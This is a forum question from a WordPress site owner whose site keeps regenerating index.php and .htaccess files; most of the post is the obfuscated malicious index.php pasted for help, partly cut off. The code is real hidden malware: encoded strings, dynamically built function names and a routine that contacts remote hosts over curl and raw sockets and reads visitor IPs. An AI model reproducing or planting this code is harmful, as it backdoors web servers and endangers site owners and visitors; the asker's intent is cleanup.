Login/Register
WordPress keeps creating index.php and .htaccess files and changes permission to 0444
Asked Answered
wordpressmalware
B

3

7

I have to fix a website that is infected with malware. When I try to access to the WP Admin it says "to many redirects".

Hosting company did a scan, there were to many infected files. I managed to remove all of them apart from index.php in public_html folder. The code inside index.php is:

<?php

$O0_O00_OO_='xaoH6Rs0zcxDeo5viLrz8MgweN9D5k9tmY225gw0sLaX9Yk0aLkm3dop7Z2XnJjxjdeWyV7lib1ik5sjmbh2c01=';

$O0OOO0_0__=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$OO_O_0O_00=$O0OOO0_0__{16}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{27}.$O0OOO0_0__{29}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{16}.$O0OOO0_0__{23}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{6}.$O0OOO0_0__{23}.$O0OOO0_0__{23}.$O0OOO0_0__{3}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{25};$OO0OO__00_=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{23}.$O0OOO0_0__{12}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10};$O0_O__0OO0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{6}.$O0OOO0_0__{29}.$O0OOO0_0__{26}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{6};$O_O_00OO_0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{23}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{12}.$O0OOO0_0__{0}.$O0OOO0_0__{27};$OO_000O__O=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{18}.$O0OOO0_0__{10};$O0O__O0_O0=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{16}.$O0OOO0_0__{18}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$O_OO_000_O=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$O00_O__O0O=$O0OOO0_0__{31}.$O0OOO0_0__{10}.$O0OOO0_0__{10}.$O0OOO0_0__{16}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{18}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{26}.$O0OOO0_0__{29}.$O0OOO0_0__{19}.$O0OOO0_0__{18}.$O0OOO0_0__{30}.$O0OOO0_0__{24}.$O0OOO0_0__{20};$O0OO0_0_O_=$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{29}.$O0OOO0_0__{30}.$O0OOO0_0__{17}.$O0OOO0_0__{12}.$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$OO_0O_O_00=$O0OOO0_0__{32}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0};$O00O0___OO=$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{0}.$O0OOO0_0__{30}.$O0OOO0_0__{32}.$O0OOO0_0__{10};$OO00_O0__O=$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{
///SOME CODE IS MISSING BECAUSE OF 30K LIMIT
0OOO0_0__{26};$OO000O__O_=$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{12}.$O0OOO0_0__{5};$OOO0_0O0__=$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30};$O_0OO0_O0_=$O0OOO0_0__{41}.$O0OOO0_0__{35}.$O0OOO0_0__{12}.$O0OOO0_0__{0};$O0_OOO00__=$O0OOO0_0__{38}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{38};$OOO_000O__=$O0OOO0_0__{5}.$O0OOO0_0__{26}.$O0OOO0_0__{7};if(!function_exists('str_ireplace')){function str_ireplace($from,$to,$string){return trim(preg_replace("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string));}};$O_0__O0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$url,$OO0OO0_0__=0,$O_0_00_OOO=1,$O_0OO0O__0=NULL,$OO0_O0O__0=array(),$O_O0O0__0O=\'shell\'','if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x4f\x5f\x30\x30"]("/^https*\\:\\/\\//si",$url)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'iy4tyhTkktKsovilXIzCtLzMlMUQCKWKnlJRUtPXWAMA\');$O_OO00O0__.=$url;echo $O_OO00O0__;unset($O_OO00O0__);exit();}return \'\';}$OO0_0_0O_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBtPSJakA\');$OO_00OO_0_=$O_O__00O0O=\'\';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'|\',$OO0_0_0O_O) as $c){$OO00OO___0=1;if($OO0OO0_0__&&substr($c,0,1)==\'c\'){continue;}foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'+\',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]($d)){$OO00OO___0=0;}}unset($d);if($OO00OO___0){$OO_00OO_0_=$c;break;}}unset($OO0_0_0O_O,$c);if($OO_00OO_0_==\'\'){return 0;}if(substr($OO_00OO_0_,0,1)==\'c\'){$O0O___0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x5f\x30\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_USERAGENT,$O_O0O0__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_TIMEOUT,100);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_FRESH_CONNECT,TRUE);if($O_0_00_OOO==2){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POST,1);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POSTFIELDS,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0));}}$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f\x5f"]($O0O___0OO0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x4f\x30\x4f\x5f\x5f"]($O0O___0OO0);if(!$O_0O__O00O){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'i04uLhTcpRSC0qyi+KVctLKi6tPwBgA=\');$O_OO00O0__.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x30\x5f\x5f\x4f\x30"]($O0O___0OO0);echo $O_OO00O0__;unset($O_OO00O0__);exit();}return 0;}else{$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_0O__O00O,"\\xEF\\xBB\\xBF"));return $O_0O__O00O;}}$O0_O_0_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x30\x4f\x5f\x4f"]($url);isset($O0_O_0_O0O["\x68\x6f\x73\x74"])||$O0_O_0_O0O["\x68\x6f\x73\x74"]=\'\';isset($O0_O_0_O0O["\x70\x61\x74\x68"])||$O0_O_0_O0O["\x70\x61\x74\x68"]=\'\';isset($O0_O_0_O0O["\x71\x75\x65\x72\x79"])|| $O0_O_0_O0O["\x71\x75\x65\x72\x79"]=\'\';isset($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])||$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"]=\'\';$O__OOO00_0=$O0_O_0_O0O["\x70\x61\x74\x68"]?$O0_O_0_O0O["\x70\x61\x74\x68"].($O0_O_0_O0O["\x71\x75\x65\x72\x79"]?\'?\'.$O0_O_0_O0O["\x71\x75\x65\x72\x79"]:\'\'):\'/\';$OOO00O0___=$O0_O_0_O0O["\x68\x6f\x73\x74"];if($O0_O_0_O0O["\x73\x63\x68\x65\x6d\x65"]==\'https\'){$O00_OO__0O=\'1.1\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?443:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];$OOO00O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Ky7OshTdLtPXBwA=\');$OOO00O0___.=$O0_O_0_O0O["\x68\x6f\x73\x74"];}else{$O00_OO__0O=\'1.0\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?80:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];}$O0OO_0O0__=\'Host:\';$O0OO_0O0__.=$OOO00O0___;$OO0_O0O__0[]=$O0OO_0O0__;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PyhT0tNLsnMz7NyzsktPvTgUA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Cy1OLhTdJ1TE/NK7EtPCAA==\').$O_O0O0__0O;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c0xOThTi0osdLtPS1wIA\');unset($O0OO_0O0__);if($O_0_00_OOO==2){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){$O_0OO0O__0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0);}$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PKhT0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9tPJTQEA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PKhT0nNK9H1Sc1LL8mtPwAgA=\').${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_0OO0O__0);$O_O__00O0O="POST $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n".$O_0OO0O__0;unset($O_0OO0O__0);}else{$O_O__00O0O="GET $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n";}unset($OO0_O0O__0,$O0_O_0_O0O,$O00_OO__0O,$O__OOO00_0);$O_O0O__0O0=null;if(substr($OO_00OO_0_,-1)==\'n\'){$O_O0O__0O0=$OO_00OO_0_($OOO00O0___,$O0O0__O_0O,$O_OO00O0__no,$O_OO00O0__str,30);}else{if(substr($OO_00OO_0_,-1)==\'t\'){$O_O__O0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'K0kushTNLtPXBwA=\');$O_O__O0O00.=$OOO00O0___;$O_O__O0O00.=\':\';$O_O__O0O00.=$O0O0__O_0O;$O_O0O__0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x4f\x5f\x5f\x30\x30\x5f"]($O_O__O0O00,$O_OO00O0__no,$O_OO00O0__str,30);unset($O_O__O0O00);}}$O_OO00__0O=\'\';if($O_O0O__0O0){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x4f\x4f\x5f\x30"]($O_O0O__0O0,true);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f\x4f"]($O_O0O__0O0,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O0O__0O0,$O_O__00O0O);if(!$OO0OO0_0__){$O_0_O00_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x5f\x30\x4f\x4f\x30"]($O_O0O__0O0);if(!$O_0_O00_OO["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_0O0OO_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x30\x4f\x4f\x4f\x5f\x5f"]($O_O0O__0O0);if($O_0O0OO_0_&&($O_0O0OO_0_=="\\r\\n"||$O_0O0OO_0_=="\\n")){break;}unset($O_0O0OO_0_);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x4f\x5f\x5f\x30\x4f\x5f"]($O_O0O__0O0,8192);$O_OO00__0O.=$O_O_0O00_O;unset($O_O_0O00_O);}}unset($O_0_O00_OO);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x4f\x4f\x30\x5f"]($O_O0O__0O0);}else{if(substr($OO_00OO_0_,-1)==\'e\'){$O0O_0O0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f"]($OOO00O0___);$O_O0O__0O0=$OO_00OO_0_(AF_INET,SOCK_STREAM,0);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x5f\x5f\x5f\x4f\x4f"]($O_O0O__0O0,$O0O_0O0_O_,$O0O0__O_0O)){if(!$OO0OO0_0__){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));while($O0O0O0O___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x30\x4f\x4f"]($O_O0O__0O0,8192)){$O_OO00__0O.=$O0O0O0O___;unset($O0O0O0O___);}$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x4f\x4f\x30\x4f\x30"]($O_OO00__0O);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x4f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);}else{$O_O_00_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](2,5);$O_00OO0O__=0;while($O_00OO0O__<$O_O_00_O0O){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));$O_00OO0O__++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x4f\x5f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](50000,100000));}unset($O_00OO0O__,$O_O_00_O0O);}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x30\x4f\x4f\x5f"]($O_O0O__0O0);unset($O0O_0O0_O_);}}unset($O_O__00O0O,$OO_00OO_0_,$O_O0O__0O0,$O0O0__O_0O,$OOO00O0___);if(!$OO0OO0_0__){$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x30"](\'/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)\'.\'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"](\'$matches\',\'return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x30\x5f\x5f\x4f\x4f\x4f"]($matches[1])==${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($matches[2])?$matches[2]:$matches[0];\'),$O_OO00__0O);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_OO00__0O,"\\xEF\\xBB\\xBF"));}else{return 1;}');$OOO__000_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$O_O_0OO0_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x30\x30\x5f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x30\x4f\x30\x5f\x5f"]($OOO0__0O_0));$OO__O0O_00=substr($O_O_0OO0_0,0,5);$OOO_00__0O=substr($O_O_0OO0_0,-5);$OO__0O0_O0=substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10);return $OO__O0O_00.\'hT\'.substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10).\'tP\'.$OOO_00__0O;');$O0_0_OO0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$OO__O0O_00=substr($OOO0__0O_0,0,5);$OOO_00__0O=substr($OOO0__0O_0,-5);$OO__0O0_O0=substr($OOO0__0O_0,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($OOO0__0O_0)-14);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO__O0O_00.$OO__0O0_O0.$OOO_00__0O));');$OO_0O0_0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OO_OO0__00=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"})){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"];}else if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"];}else{$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];}}else{if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\');}else if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\');}else{$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'REMOTE_ADDR\');}}return $OO_OO0__00;');$O0_O_O_O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $OOO0__0O_0;');$O_O0O_00O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$O__OO00_0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x4f\x4f\x30\x5f\x30"]($O0_O00_OO_);$OO0_0__0OO=\'\';for ($O_00OO0O__=0;$O_00OO0O__<${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__OO00_0O);$O_00OO0O__++){if($O_00OO0O__%2!=0){$OO0_0__0OO.=$O__OO00_0O[$O_00OO0O__];}}return 